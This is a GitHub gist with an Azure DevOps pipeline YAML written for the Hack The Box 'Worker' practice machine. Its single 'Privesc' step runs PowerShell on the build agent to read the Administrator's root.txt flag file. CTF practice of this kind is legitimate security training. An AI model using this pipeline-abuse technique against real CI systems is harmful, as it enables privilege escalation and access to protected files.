Last active
December 6, 2020 16:31
-
-
Save PwnPeter/c6a12d66831890e044da9e8f9fd4a87d to your computer and use it in GitHub Desktop.
Exploit Azure DevOps Pipeline
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Starter pipeline | |
# Start with a minimal pipeline that you can customize to build and deploy your code. | |
# Add steps that build, run tests, deploy, and more: | |
# https://aka.ms/yaml | |
# This is for htb Worker Box :) | |
trigger: | |
- master | |
pool: 'Setup' | |
steps: | |
- powershell: type C:\Users\Administrator\Desktop\root.txt | |
displayName: 'Privesc' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment